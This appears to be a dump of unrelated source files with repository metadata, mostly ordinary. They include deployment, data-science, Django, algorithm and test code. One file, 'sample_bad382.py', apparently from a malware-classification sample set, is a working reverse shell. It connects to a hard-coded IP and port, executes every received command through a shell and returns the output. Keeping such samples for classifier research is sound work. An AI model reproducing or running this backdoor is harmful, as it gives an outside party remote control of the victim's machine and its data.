28058e366e9d750aaab587835e0cab482b1cfbc9 | 1aa44db2eb5bc0d5be21e54e3ca1f4918d5d84bf | /fabfile/servers.py | 46fd9f14a872917968e1ada16b0b196477e3cc44 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | nprapps/commencement | a2aea873704120aa8249854a1d12798f1a4b1153 | 3f8642225d1910807e6419e95fafd5e0f21fbbac | refs/heads/master | 2021-07-22T00:25:36.353670 | 2021-06-16T22:56:56 | 2021-06-16T22:56:56 | 19,289,147 | 1 | 2 | null | 2015-07-03T22:44:28 | 2014-04-29T19:36:14 | JavaScript | UTF-8 | Python | false | false | 8,460 | py | #!/usr/bin/env python
"""
Commands work with servers. (Hiss, boo.)
"""
import copy
from fabric.api import local, put, settings, require, run, sudo, task
from fabric.state import env
from jinja2 import Template
import app_config
"""
Setup
"""
@task
def setup():
"""
Setup servers for deployment.
This does not setup services or push to S3. Run deploy() next.
"""
require('settings', provided_by=['production', 'staging'])
require('branch', provided_by=['stable', 'master', 'branch'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py before setting up the servers.'
return
install_google_oauth_creds()
create_directories()
create_virtualenv()
clone_repo()
checkout_latest()
install_requirements()
setup_logs()
def create_directories():
"""
Create server directories.
"""
require('settings', provided_by=['production', 'staging'])
run('mkdir -p %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
run('mkdir -p /var/www/uploads/%(PROJECT_FILENAME)s' % app_config.__dict__)
def create_virtualenv():
"""
Setup a server virtualenv.
"""
require('settings', provided_by=['production', 'staging'])
run('virtualenv -p %(SERVER_PYTHON)s %(SERVER_VIRTUALENV_PATH)s' % app_config.__dict__)
run('source %(SERVER_VIRTUALENV_PATH)s/bin/activate' % app_config.__dict__)
def clone_repo():
"""
Clone the source repository.
"""
require('settings', provided_by=['production', 'staging'])
run('git clone %(REPOSITORY_URL)s %(SERVER_REPOSITORY_PATH)s' % app_config.__dict__)
if app_config.REPOSITORY_ALT_URL:
run('git remote add bitbucket %(REPOSITORY_ALT_URL)s' % app_config.__dict__)
@task
def checkout_latest(remote='origin'):
"""
Checkout the latest source.
"""
require('settings', provided_by=['production', 'staging'])
require('branch', provided_by=['stable', 'master', 'branch'])
run('cd %s; git fetch %s' % (app_config.SERVER_REPOSITORY_PATH, remote))
run('cd %s; git checkout %s; git pull %s %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, remote, env.branch))
@task
def install_requirements():
"""
Install the latest requirements.
"""
require('settings', provided_by=['production', 'staging'])
run('%(SERVER_VIRTUALENV_PATH)s/bin/pip install -U -r %(SERVER_REPOSITORY_PATH)s/requirements.txt' % app_config.__dict__)
run('cd %(SERVER_REPOSITORY_PATH)s; npm install' % app_config.__dict__)
@task
def setup_logs():
"""
Create log directories.
"""
require('settings', provided_by=['production', 'staging'])
sudo('mkdir %(SERVER_LOG_PATH)s' % app_config.__dict__)
sudo('chown ubuntu:ubuntu %(SERVER_LOG_PATH)s' % app_config.__dict__)
@task
def install_crontab():
"""
Install cron jobs script into cron.d.
"""
require('settings', provided_by=['production', 'staging'])
sudo('cp %(SERVER_REPOSITORY_PATH)s/crontab /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def uninstall_crontab():
"""
Remove a previously install cron jobs script from cron.d
"""
require('settings', provided_by=['production', 'staging'])
sudo('rm /etc/cron.d/%(PROJECT_FILENAME)s' % app_config.__dict__)
@task
def install_google_oauth_creds():
"""
Install Google Oauth credentials file (global) from workinprivate repo
"""
run('git clone [email protected]:nprapps/workinprivate.git /tmp/workinprivate-tmp')
run('cp /tmp/workinprivate-tmp/.google_oauth_credentials %s' % OAUTH_CREDENTIALS_PATH)
run('rm -Rf /tmp/workinprivate-tmp')
@task
def remove_google_oauth_creds():
"""
Remove Google oauth credentials file (global)
"""
run('rm %s' % OAUTH_CREDENTIALS_PATH)
def delete_project():
"""
Remove the project directory. Invoked by shiva.
"""
run('rm -rf %(SERVER_PROJECT_PATH)s' % app_config.__dict__)
"""
Configuration
"""
def _get_template_conf_path(service, extension):
"""
Derive the path for a conf template file.
"""
return 'confs/%s.%s' % (service, extension)
def _get_rendered_conf_path(service, extension):
"""
Derive the rendered path for a conf file.
"""
return 'confs/rendered/%s.%s.%s' % (app_config.PROJECT_FILENAME, service, extension)
def _get_installed_conf_path(service, remote_path, extension):
"""
Derive the installed path for a conf file.
"""
return '%s/%s.%s.%s' % (remote_path, app_config.PROJECT_FILENAME, service, extension)
def _get_installed_service_name(service):
"""
Derive the init service name for an installed service.
"""
return '%s.%s' % (app_config.PROJECT_FILENAME, service)
@task
def render_confs():
"""
Renders server configurations.
"""
require('settings', provided_by=['production', 'staging'])
with settings(warn_only=True):
local('mkdir confs/rendered')
# Copy the app_config so that when we load the secrets they don't
# get exposed to other management commands
context = copy.copy(app_config.__dict__)
context.update(app_config.get_secrets())
for service, remote_path, extension in app_config.SERVER_SERVICES:
template_path = _get_template_conf_path(service, extension)
rendered_path = _get_rendered_conf_path(service, extension)
with open(template_path, 'r') as read_template:
with open(rendered_path, 'wb') as write_template:
payload = Template(read_template.read())
write_template.write(payload.render(**context))
@task
def deploy_confs():
"""
Deploys rendered server configurations to the specified server.
This will reload nginx and the appropriate uwsgi config.
"""
require('settings', provided_by=['production', 'staging'])
render_confs()
with settings(warn_only=True):
for service, remote_path, extension in app_config.SERVER_SERVICES:
rendered_path = _get_rendered_conf_path(service, extension)
installed_path = _get_installed_conf_path(service, remote_path, extension)
a = local('md5 -q %s' % rendered_path, capture=True)
b = run('md5sum %s' % installed_path).split()[0]
if a != b:
print 'Updating %s' % installed_path
put(rendered_path, installed_path, use_sudo=True)
if service == 'nginx':
sudo('service nginx reload')
elif service == 'uwsgi':
service_name = _get_installed_service_name(service)
sudo('initctl reload-configuration')
sudo('service %s restart' % service_name)
elif service == 'app':
run('touch %s' % app_config.UWSGI_SOCKET_PATH)
sudo('chmod 644 %s' % app_config.UWSGI_SOCKET_PATH)
sudo('chown www-data:www-data %s' % app_config.UWSGI_SOCKET_PATH)
else:
print '%s has not changed' % rendered_path
@task
def nuke_confs():
"""
DESTROYS rendered server configurations from the specified server.
This will reload nginx and stop the uwsgi config.
"""
require('settings', provided_by=['production', 'staging'])
for service, remote_path, extension in app_config.SERVER_SERVICES:
with settings(warn_only=True):
installed_path = _get_installed_conf_path(service, remote_path, extension)
sudo('rm -f %s' % installed_path)
if service == 'nginx':
sudo('service nginx reload')
elif service == 'uwsgi':
service_name = _get_installed_service_name(service)
sudo('service %s stop' % service_name)
sudo('initctl reload-configuration')
elif service == 'app':
sudo('rm %s' % app_config.UWSGI_SOCKET_PATH)
"""
Fabcasting
"""
@task
def fabcast(command):
"""
Actually run specified commands on the server specified
by staging() or production().
"""
require('settings', provided_by=['production', 'staging'])
if not app_config.DEPLOY_TO_SERVERS:
print 'You must set DEPLOY_TO_SERVERS = True in your app_config.py and setup a server before fabcasting.'
run('cd %s && bash run_on_server.sh fab %s $DEPLOYMENT_TARGET %s' % (app_config.SERVER_REPOSITORY_PATH, env.branch, command))
| [
"[email protected]"
] | |
b672d74dc3ade9ca857ed2b97d2a8bc96d25a527 | d78989a8ce52a98f48d77228c4ea893f7aae31f7 | /symbolic_expressions/sample15-virt-bogus-loop-iterations-2.py | 80503fc33404de03c7ff542b5ba14a32feb2dee4 | [] | no_license | llyuer/Tigress_protection | 78ead2cf9979a7b3287175cd812833167d520244 | 77c68c4c949340158b855561726071cfdd82545f | refs/heads/master | 2020-06-17T11:16:40.078433 | 2019-04-16T09:27:29 | 2019-04-16T09:27:29 | 195,908,093 | 1 | 0 | null | 2019-07-09T01:14:06 | 2019-07-09T01:14:06 | null | UTF-8 | Python | false | false | 1,086 | py | #!/usr/bin/env python2
## -*- coding: utf-8 -*-
import sys
def sx(bits, value):
sign_bit = 1 << (bits - 1)
return (value & (sign_bit - 1)) - (value & sign_bit)
SymVar_0 = int(sys.argv[1])
ref_342 = SymVar_0
ref_353 = ref_342 # MOV operation
ref_365 = ref_353 # MOV operation
ref_367 = ref_365 # MOV operation
ref_331345 = ref_367 # MOV operation
ref_331357 = ref_331345 # MOV operation
ref_331403 = ref_331345 # MOV operation
ref_331447 = ref_331345 # MOV operation
ref_331534 = (((rol(0xE, (rol(0xE, ((((((((((((0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) << 8 | 0x0) + ref_331357) & 0xFFFFFFFFFFFFFFFF) + 0x1F3D5B79) & 0xFFFFFFFFFFFFFFFF)) ^ ref_331403)) ^ 0x1F3D5B79) + ref_331447) & 0xFFFFFFFFFFFFFFFF) # MOV operation
ref_527456 = ref_331534 # MOV operation
ref_592749 = ref_527456 # MOV operation
ref_788657 = ref_592749 # MOV operation
ref_853947 = ref_788657 # MOV operation
ref_853985 = ref_853947 # MOV operation
ref_853997 = ref_853985 # MOV operation
ref_853999 = ref_853997 # MOV operation
print ref_853999 & 0xffffffffffffffff
| [
"[email protected]"
] | |
23867764f0cc8d30cda919abd564c7282ccb15db | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/201-tideGauge.py | 52b44422312b41361c88c8c467dad6e7167ae1b9 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,456 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 201
y = 202
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"[email protected]"
] | |
a741f54aa2bfa5f22db1890af574ff5b01ac58b0 | 4b46bcb9e3883a57f46d490da424e8d9463ba8aa | /PyFolder/Python_Django/app_integration/apps/appintegrate/models.py | 9f694e3217e40b8ecf4af783c0155140d3aaa317 | [] | no_license | LAdkins81/DojoAssignments | 1752c131454dc6f259d4e84390af218e1a423b50 | 7bc7a92bed72ff37c5d8991e478ffae8fefd82db | refs/heads/master | 2021-01-11T17:53:03.814123 | 2017-05-09T14:58:33 | 2017-05-09T14:58:33 | 79,859,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | from __future__ import unicode_literals
from django.db import models
from ..courses.models import Course
from ..loginandreg.models import User
from django.db.models import Count
# Create your models here.
class UserCourseManager(models.Manager):
def addUserToCourse(self, object):
user_id = object['users']
user = User.objects.get(id=user_id)
course_id = object['courses']
course = Course.objects.get(id=course_id)
UserCourse.objects.create(user_id=user, course_id=course)
return {'success' : 'User added to course'}
class UserCourse(models.Model):
user_id = models.ForeignKey(User, null=True, related_name="reg_users")
course_id = models.ForeignKey(Course, related_name="reg_courses")
created_at = models.DateTimeField(auto_now_add=True, null=True)
updated_at = models.DateTimeField(auto_now=True)
objects = UserCourseManager()
| [
"[email protected]"
] | |
57968c4b0079829bed20ff53911d5d768715b9fd | 7798c5171e4f63b40e9a2d9ae16f4e0f60855885 | /manage.py | b3a505230aac16ae6ce9859ed552d3f4d09d2d80 | [] | no_license | mstepniowski/wffplanner | d2d5ddd2938bd2b7b294332dad0d24fa63c2700a | 62d1d00ca9a546b759e5c394c7a9da06484a7aa3 | refs/heads/master | 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
945d9d0dbf297f3e00334a032fd8cd7922a9654e | 6cd87462fd9b5ee575aee281f6d2e4be5391ea92 | /apps/twitter/admin.py | f4524da329c2671ab002a1df4a319053a229dfa3 | [] | no_license | mo-mughrabi/djsocial | 912413574fd7ce943387dbd5744f05ec8ca57f48 | 060c0a8e0db848879dfaeb4c6f44f1dba7a39aea | refs/heads/master | 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')
# Now register the new TwitterAdmin...
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
list_display = ('user', 'label', 'status','created_at', 'last_run')
admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')
admin.site.register(Order, OrderAdmin) | [
"="
] | = |
4a2d4fecf255307e71b25519413f146f1bdacfd9 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py | 053496e29b0e65f9a467defbd48dcafc83eb967e | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | """
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if len(s) == 0: return True
curS, curT= 0, 0
while curT <= len(t) - 1:
if s[curS] == t[curT]:
curS+=1
if curS == len(s):
return True
curT+=1
return curS == l
s = Solution()
print(s.isSubsequence("abc","ahbgdc")) | [
"[email protected]"
] | |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5 | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code308RangeSumQuery2DMutable.py | f914f056042314c3f89d84a5b8ddf3bfe388b092 | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,454 | py | """
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
def __init__(self, matrix):
self.M = len(matrix)
self.N = len(matrix[0]) if self.M > 0 else 0
self.mat = [[0]*self.N for _ in range(self.M)] # (M)*(N) matrix that stores current value (update method may change value)
self.bit = [[0]*(self.N+1) for _ in range(self.M+1)] # (M+1)*(N+1) matrix that represents a 2-D BIT
# use update method to create the 2-D BIT
for i in range(self.M):
for j in range(self.N):
self.update(i, j, matrix[i][j])
def update(self, row: int, col: int, val: int) -> None:
if -1 < row < self.M and -1 < col < self.N:
diff = val - self.mat[row][col]
self.mat[row][col] = val
i = row + 1 # mat has 0-based index and BIT has 1-based index. Pitfall: don't initialize j to (col + 1) here
while i < self.M + 1:
j = col + 1
while j < self.N + 1:
self.bit[i][j] += diff
j += j & (-j)
i += i & (-i)
def getSum(self, row: int, col: int) -> int:
"""
sum of the rectangle area from (0, 0) to (row, col), exclusive row & col
"""
res = 0
if -1 < row - 1 < self.M and -1 < col - 1 < self.N:
i = row
while i > 0:
j = col
while j > 0:
res += self.bit[i][j]
j -= j & (-j)
i -= i & (-i)
return res
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
return self.getSum(row2+1, col2+1)\
- self.getSum(row2+1, col1)\
- self.getSum(row1, col2+1)\
+ self.getSum(row1, col1)
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
def test_1(self):
matrix = [[3, 0, 1, 4, 2],\
[5, 6, 3, 2, 1],\
[1, 2, 0, 1, 5],\
[4, 1, 0, 1, 7],\
[1, 0, 3, 0, 5]]
#matrix = [[3, 0], [5, 6]]
m = NumMatrix(matrix)
self.assertEqual(14, m.getSum(2, 2))
self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
m.update(3, 2, 2)
self.assertEqual(10, m.sumRegion(2, 1, 4, 3))
if __name__ == "__main__":
unittest.main(exit = False) | [
"[email protected]"
] | |
4125a3a6906417841daee6699df1daa262068870 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03069/s036551857.py | 273e2d32d2871800eb6b588af947e2fe9c71f0b3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | import sys,math,collections,itertools
input = sys.stdin.readline
N = int(input())
s = input().rstrip()
cntb =0
cntw = s.count('.')
ans =cntw
for i in range(len(s)):
if s[i] == '#':
cntb +=1
else:
cntw -=1
ans = min(ans,cntb+cntw)
print(ans) | [
"[email protected]"
] | |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e | 73e939e797cc28aa33a4f55c234237c47167033e | /test/test_transaction_summary.py | b5bc1ae60e987c82adcad1bf24cbb8c6ef351245 | [] | no_license | dmlerner/ynab-api | b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046 | df94b620d9ec626eacb9ce23bfd313f1c589b03a | refs/heads/master | 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 | Python | UTF-8 | Python | false | false | 975 | py | """
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
class TestTransactionSummary(unittest.TestCase):
"""TransactionSummary unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTransactionSummary(self):
"""Test TransactionSummary"""
# FIXME: construct object with mandatory attributes with example values
# model = TransactionSummary() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0fb0c324b7732ab490a71f2d069eca7673a43eb2 | 7a87119ef5d77a1b225aab45083a45dcd376684c | /6_palindroom.py | b71f3511d35f1b2ab48041d139ac45ce6325a707 | [] | no_license | astilleman/MI | 0e31e0f4098502e83a13805feae82e038c169bb7 | 1564fd28f759761c3e186d41107c9abff3b69070 | refs/heads/master | 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | """
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
result = True
if string == "":
exit()
if string[0] != string[-1]:
result = False
else:
result = is_palindroom(string[1:len(string)])
return result
# TESTS
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
| [
"[email protected]"
] | |
174e5543c3d14be2f7973435e139bd2bb9bc19b5 | ef2f932655e4591c4f654431cd96eedd0af2b5ba | /tests/example.py | b717490fbd69d71977bed6f795fb9a7c57e8a744 | [
"MIT"
] | permissive | cair/hex-ai | b380447c6dd445452c161babefdfadf329e899fa | 70c134a1479b58634e62c845314c7536ad64e4be | refs/heads/master | 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 | MIT | 2021-04-19T17:44:02 | 2019-09-18T09:46:06 | C | UTF-8 | Python | false | false | 540 | py | from PyHex import Hex11 as Hex
if __name__ == "__main__":
hg = Hex.HexGame()
winner = -1
for game in range(10000000):
Hex.init(hg)
player = 0
while Hex.full_board(hg) == 0:
position = Hex.place_piece_randomly(hg, player)
if Hex.winner(hg, player, position):
winner = player
break
player = 1 - player
if hg.number_of_open_positions >= 75:
print("\nPlayer %s wins!\n\n" % (winner, ))
Hex.print(hg)
| [
"[email protected]"
] | |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330 | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad382.py | 9b733b70a15ec41b80a16eccdf59369f39e4f4a9 | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | import bz2
import threading
import socket
import subprocess
import lzma
import hashlib
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
b10302ab2daca47e9bd8afe17228e2f901d2976a | d00b1e01f82076248eb07d6391fafabfbac74898 | /metadata/FrostNumber/hooks/pre-stage.py | 7f090d9c2b69e9473bb79627b7d4db1dbab856b5 | [
"MIT"
] | permissive | csdms/wmt-metadata | 9b922415faa397e3d5511f258e1a4fda846b78b7 | 39207acc376f1cd21b2ae1d5581a1e2c317a6441 | refs/heads/master | 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 | MIT | 2018-10-31T19:36:54 | 2016-02-04T00:23:47 | Python | UTF-8 | Python | false | false | 769 | py | """A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
file_list = []
def execute(env):
"""Perform pre-stage tasks for running a component.
Parameters
----------
env : dict
A dict of component parameter values from WMT.
"""
env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
env['fn_out_filename'] = 'frostnumber_output.dat'
assign_parameters(env, file_list)
for fname in file_list:
src = find_simulation_input_file(env[fname])
shutil.copy(src, os.curdir)
env['_file_list'] = file_list
